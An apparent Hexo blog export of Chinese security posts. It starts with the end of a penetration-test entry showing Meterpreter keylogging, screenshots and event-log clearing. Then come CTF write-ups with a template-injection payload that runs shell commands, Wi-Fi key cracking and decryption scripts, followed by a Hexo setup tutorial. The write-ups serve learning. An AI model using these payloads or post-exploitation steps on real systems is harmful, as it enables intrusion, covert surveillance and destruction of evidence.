&gt; shellProcess 5828 created.Channel 3 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\wamp\bin\apache\Apache2.2.21&gt;quserquser USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME vagrant console 1 Active none 1/22/2019 6:06 PM 检查闲置多久 12meterpreter &gt; idletimeUser has been idle for: 6 hours 20 mins 34 secs 多次截图对比管理员是否有操作 12meterpreter &gt; screenshotScreenshot saved to: /root/KMcxOzFn.jpeg 获取用户hash 键盘监控，不过没成功。。。 123456789meterpreter &gt; keyscan_startStarting the keystroke sniffer ...meterpreter &gt; keyscan_dumpDumping captured keystrokes...meterpreter &gt; meterpreter &gt; keyscan_stopStopping the keystroke sniffer... 还有很多骚操作日后尝试。。现在最重要就是清除痕迹(事件日志) clearev]]></content>
      <categories>
        <category>渗透测试</category>
      </categories>
      <tags>
        <tag>nmap</tag>
        <tag>msf</tag>
        <tag>Linux</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[PCB2018部分Writeup]]></title>
    <url>%2F2018%2F12%2F05%2FPCB2018%E9%83%A8%E5%88%86Writeup%2F</url>
    <content type="text"><![CDATA[MISChack1t(复现队里大佬的) 题目给了完整的VM虚拟机压缩包，文件都经过了加密，但给出了密码bibinb 用密码登陆，发现无法直接登陆系统，还需要账号密码，简单的root等弱口令失败告终；在进入系统时进入GRUB进行恢复密码，发现根本没这个选项，一下子没了什么思路，开始面向搜索引擎 一番操作后大佬找这个破解VMX配置 可以通过配置CD-ROM的系统来加载这个文件 首先解密一下这个”Ubuntu 64-bit.vmx”,然后输入密码bibinb 发现报错 Error: File Ubuntu 64-bit.vmx is not a valid VMX file 原来是main.py脚本有瑕疵(果然我是做不出来的，因为遇到这个我是直接放弃的) 把N改成n就行,然后得到1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192Password:guestos = "ubuntu-64"virtualhw.version = "13"config.version = "8"numvcpus = "2"cpuid.coresPerSocket = "1"memsize = "2048"pciBridge0.present = "TRUE"pciBridge4.present = "TRUE"pciBridge4.virtualDev = "pcieRootPort"pciBridge4.functions = "8"pciBridge5.present = "TRUE"pciBridge5.virtualDev = "pcieRootPort"pciBridge5.functions = "8"pciBridge6.present = "TRUE"pciBridge6.virtualDev = "pcieRootPort"pciBridge6.functions = "8"pciBridge7.present = "TRUE"pciBridge7.virtualDev = "pcieRootPort"pciBridge7.functions = "8"vmci0.present = "TRUE"mks.enable3d = "true"scsi0:0.present = "TRUE"scsi0:0.deviceType = "disk"scsi0:0.fileName = "Ubuntu 64-bit-disk1.vmdk"scsi0:0.mode = "persistent"scsi0.virtualDev = "lsilogic"scsi0.present = "TRUE"sata0.present = "TRUE"vmci0.unrestricted = "false"vcpu.hotadd = "true"mem.hotadd = "true"powerType.powerOff = "soft"powerType.reset = "soft"powerType.suspend = "soft"toolscripts.afterpoweron = "true"toolscripts.afterresume = "true"toolscripts.beforepoweroff = "true"toolscripts.beforesuspend = "true"tools.syncTime = "false"nvram = "Ubuntu 64-bit-file1.nvram"virtualHW.productCompatibility = "hosted"extendedConfigFile = "Ubuntu 64-bit.vmxf"dataFileKey = "type=key:cipher=AES-256:key=NHhuUIeIg1lhhNi7CvHXZysR+lrMxsNhJl7DO0SIuZ4%3d"cryptoState = "encrypted"isolation.tools.copy.disable = "TRUE"isolation.tools.dnd.disable = "TRUE"isolation.tools.paste.disable = "TRUE"policy.vm.mvmtid = "52 b5 65 b9 89 e2 54 bf-e2 ee e6 99 1f 9d 2d 29"rollingTier0.uid = "1"rollingTier0.interval = "86400"rollingTier0.maximum = "1"rollingTier0.clientFlags = "8"rollingTier0.displayName = "自动保护快照"rollingTier1.uid = "2"rollingTier1.interval = "604800"rollingTier1.baseTier = "1"rollingTier1.baseTierInterval = "7"rollingTier1.maximum = "1"rollingTier1.clientFlags = "8"rollingTier1.displayName = "自动保护快照"rollingTier2.uid = "3"rollingTier2.interval = "2419200"rollingTier2.baseTier = "1"rollingTier2.baseTierInterval = "28"rollingTier2.maximum = "1"rollingTier2.clientFlags = "8"rollingTier2.displayName = "自动保护快照"snapshot.numRollingTiers = "3"floppy0.present = "FALSE"uuid.bios = "56 4d 93 ac e2 84 54 3c-79 fd be 1f 62 8c 5d 67"uuid.location = "56 4d 93 ac e2 84 54 3c-79 fd be 1f 62 8c 5d 67"migrate.hostlog = ".\Ubuntu 64-bit-0dae80fb.hlog"scsi0:0.redo = ""pciBridge0.pciSlotNumber = "17"pciBridge4.pciSlotNumber = "21"pciBridge5.pciSlotNumber = "22"pciBridge6.pciSlotNumber = "23"pciBridge7.pciSlotNumber = "24"scsi0.pciSlotNumber = "16"vmci0.pciSlotNumber = "32"sata0.pciSlotNumber = "33"vmci0.id = "-119750326"monitor.phys_bits_used = "43"vmotion.checkpointFBSize = "4194304"vmotion.checkpointSVGAPrimarySize = "134217728"cleanShutdown = "TRUE"softPowerOff = "FALSE"svga.guestBackedPrimaryAware = "TRUE"rollingTier0.timeSincelast = "2008"rollingTier1.timeSincelast = "2008"rollingTier2.timeSincelast = "2008" ps:注意用py3,用py2总是报错~同时要把中文随便改成英文，不然编码错误 接下来就是配置CD-ROM了，看了一下自己的kali的vmx配置，主要多了如下 123sata0:0.deviceType = "cdrom-image"sata0:0.fileName = "D:\tongyongPE\kali-linux-2017.2-amd64.iso"sata0:0.present = "TRUE" 把它加到解密出来的vmx文件，然后再用bibinb密码加密回去 python3 main.py -e -D “Ubuntu 64-bit” -p bibinb dec.vmx myenc.mvx 将’myenc.mvx’替换掉原来的’Ubuntu 64-bit.vmx’ 在打开，发现 进入系统的过程按ESC进入Boot Menu,选择CD-ROM Drive,然后选择第一个 进入系统后看到一个20GB的磁盘,然后进去搜flag 4个文件放到一起打开 大佬太强~！！ Traffic_Light 题目给了一个红绿灯的gif文件 看了一下有1168帧 经过测试，最后发现绿灯为0，红灯为1，黄灯为空格 手动太累，还是写代码吧12345678910111213141516171819202122232425262728import os,sysimport hashlibdef GetFileMd5(filename): if not os.path.isfile(filename): return myhash = hashlib.md5() f = open(filename,'rb') while True: b = f.read(8096) if not b : break myhash.update(b) f.close() return myhash.hexdigest()flag = ""for i in range(0,1168): filepath="Traffic_Light/IMG%05d.bmp"%i if GetFileMd5(filepath)=="30a63c9d2ab0f27742a56ed5817723f8": #green flag += "0" elif GetFileMd5(filepath)=="fe8ab48b0f01daf1015607fdfa135621": #red flag += "1"print flagFLAG=''for i in range(len(flag)/8): FLAG+=chr(int(flag[i*8:i*8+8],2))print FLAG GreatWall 题目给一张长城的png，4M多，简单binwalk没发什么，考虑LSB 保存下来继续binwalk得到一张图片 长杠为1短杠为0,+为分隔符,好像只能手工写下来 What’s_this 题目拿到一张图片What’s_this.jpg binwalk，foremost得到 打开word文档，找到隐藏信息(并没卵用) docx后缀改zip，找到一个”有用的文件”I_Love_You.emf 再看2-stage.what这个文件很奇怪，JPG头，PNG尾，并且和zip2.zip里面的2-stage字节大小相同，但crc32不同，估计将2-stage.what改为PNG头后进行明文攻击改为如下 然后改后缀为png能打开(并没什么卵用) 但是可以发现此时2-stage.png和zip2.zip里面的2-stage的CRC32相同，明文攻击得到zip2.zip密码为Hello_Hi 得到如下(感觉被戏耍~，一堆没用的信息) 一下子没了思路，滚去睡觉 后来官方提示cloacked-pixel，用这个工具对2-stage.png提取，密码为Hello_Hi python lsb.py extract 2-stage.png out Hello_Hi 友情链接 得到加密压缩包zip3.zip和zip4.zip zip3.zip用CRC32碰撞得出文本内容为girl同时也是zip4的密码 很遗憾得到fake flag 此时“有用的文件”作用就来了，发现I_Love_You.emf和zip4.zip字节相同，尝试异或两个文件 12345678910111213141516#coding=utf8f1=open("I_Love_You.emf","rb")text1=f1.read()f2=open("zip4.zip","rb")text2=f2.read()data=''for i in range(len(text1)): data+=chr(ord(text1[i])^ord(text2[i]))f3=open("flag.zip","wb")f3.write(data)f1.close()f2.close()f3.close() Get flag]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>CTF</tag>
        <tag>Misc</tag>
        <tag>Web</tag>
        <tag>Python</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[hxb2018部分writeup]]></title>
    <url>%2F2018%2F11%2F23%2Fhxb2018%E9%83%A8%E5%88%86writeup%2F</url>
    <content type="text"><![CDATA[MiscFlow 流量取证，这个流量包中隐藏着一些秘密，你能找出来吗？ 拿到一个pacp流量包打开,发现全是802.11协议的,是WALN无线报文，并且经过加密，先解密 上kali用aircrack-ng直接跑 之前师兄的几个字典都不行，后来发现kali自带的很不错 wireshark导入密钥 导入后发现内容多了许多,字符串搜索flag Disk 磁盘隐写，这个磁盘上隐藏着一些秘密，你能找出来吗？ 题目给了一个-flat.vmdk文件,-flat.vmdk文件,-flat.vmdk文件(坑死了，简单的题目复杂化~) 本菜鸟本着面向搜索引擎做题的方法，看到了这个重建虚拟机丢失的虚拟磁盘vmdk，然后各种配置esxi环境失败,到后面也没连上去哈哈 正常操作一下，发现360压缩能打开（其它压缩软件貌似打不开的，360NB；后来发现360压缩可以看到NTFS交换数据流隐写的,如下面的ADS） flag0-3.txt都发现flag is not here;are you kidding? 然后看到flag0-3.txt:ads,打开发现是不可打印字符 用winhex打开发现一串二进制数，把4个文件的二进制数连起来转为ascii即可 还是太菜了，自从护网杯那道内存取证，一直对取证题敬畏，谁会想到这道题这么简单~ Hidden Write 没有套路，很常规的隐写，注意看图片末尾 题目给了一张龙猫的图片，放进winhex看一下 发现3个IHDR和IEND，理论存在3张图片，但binwalk只能得到原图一张，发现后两张少了PNG头，补上89504E470D0A1A0A 成功binwalk出3张图片 在分离出的第二张图片LSB发现一部分flag 第一和第三张是盲水印(字节小是原图，大有水印) 盲水印脚本 在最原始原图未发现最后一部分flag WebXmeO 注册账号，模板注入 1&#123;&#123;''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('grep -r -n "hxb" /home').read()&#125;&#125; show得到flag,或者登陆账号admin密码admin,发现里面有大佬遗留下来的做题痕迹，直接show拿走flag23333 ReverseReplace 有壳，kali下upx -d去壳 将数据提取出来，附上大佬脚本 CryptoCommon Crypto 密码学是个exe？不高兴又是Re ida打开程序大概知道是AES加密，从==sub_140001000== 中也可以看到一些赋值，估计是密钥 对于密文，前半部分是AES加密，后半部分则是decode(‘hex’) 脚本附上1234567from Crypto.Cipher import AESkey = '\x1b\x2e\x35\x46\x58\x6e\x72\x86\x9b\xa7\xb5\xc8\xd9\xef\xff\x0c'text='8aeb45c62003ba52e46c9600b3699b8c30386334623434393136633963356136'ciphertext = text.decode('hex')decodesys = AES.new(key)print decodesys.decrypt(ciphertext)[:16] + ciphertext[-16:] + '&#125;'#hxb2018&#123;d9e801ec08c4b44916c9c5a6&#125; 大佬的详细WP 总结还是太菜了，比赛期间本菜鸡都依靠强大的队友瑟瑟发抖的划水，别的大佬都在日主办方服务器~]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>CTF</tag>
        <tag>Crypto</tag>
        <tag>Misc</tag>
        <tag>Web</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[用hexo搭建本地博客]]></title>
    <url>%2F2018%2F11%2F11%2F%E7%94%A8hexo%E6%90%AD%E5%BB%BA%E6%9C%AC%E5%9C%B0%E5%8D%9A%E5%AE%A2%2F</url>
    <content type="text"><![CDATA[为什么搭博客？还不是因为无聊，学习是不可能的，这辈子都不可能学习；打LOL又嫌舍友太菜。开个玩笑，搭建自己的博客主要还是因为记录下自己的学习成长过程嘛，队里的大佬都有自己的Blog，自己也不好意思落下，有空的上传下自己的做题的writeup或复现还是不错的。 什么是Hexo？我不知道，网上教程多 Hexo 是一个快速、简洁且高效的博客框架。Hexo 使用 Markdown（或其他渲染引擎）解析文章，在几秒内，即可利用靓丽的主题生成静态网页。 前提环境 node.js Git ps:我是在Windows下做的，linux用户只需(git自带) 12sudo apt-get install nodejssudo apt-get install npm 出现以下情况则安装成功 然后你就可以快乐地在一个新文件夹里右键Git Bash Here $ npm install -g hexo-cli 成功如下 建站 在想要建站的文件夹中(必须是空文件夹)输入如下 hexo init #初始化该文件夹,需要点时间 在文件夹发现多了些文件目录如下 12345678.├── _config.yml├── package.json├── scaffolds├── source| ├── _drafts| └── _posts└── themes _config.yml是网站配置信息详情 继续刚才的文件夹输入如下安装组件 npm install 生成静态文件和启动服务器12hexo ghexo s 浏览器输入http://localhost:4000/出现如下，恭喜博客初步建成 下面介绍一些常用hexo命令new $ hexo new [layout] 新建一篇文章。如果没有设置 layout 的话，默认使用 _config.yml 中的 default_layout 参数代替。如果标题包含空格的话，请使用引号括起来。 generate $ hexo generate 生成静态文件,等价于hexo g server $ hexo server 启动服务器等价于hexo s。默认情况下，访问网址为： http://localhost:4000/。 clean $ hexo clean 清除缓存文件 (db.json) 和已生成的静态文件 (public)。 在某些情况（尤其是更换主题后），如果发现您对站点的更改无论如何也不生效，您可能需要运行该命令。 deploy hexo deploy 部署网站。等价于hexo d ps:用这个命令要先安装扩展 npm install hexo-deployer-git –save 部署到网站的一般流程123hexo cleanhexo ghexo d 不过此前一般在本地测试12hexo ghexo s]]></content>
      <categories>
        <category>教程</category>
      </categories>
      <tags>
        <tag>教程</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[MyFirst]]></title>
    <url>%2F2018%2F11%2F07%2FMyFirst%2F</url>
    <content type="text"><![CDATA[第一篇博客 Hello World！]]></content>
      <categories>
        <category>心情</category>
      </categories>
      <tags>
        <tag>心情</tag>
      </tags>
  </entry>
</search>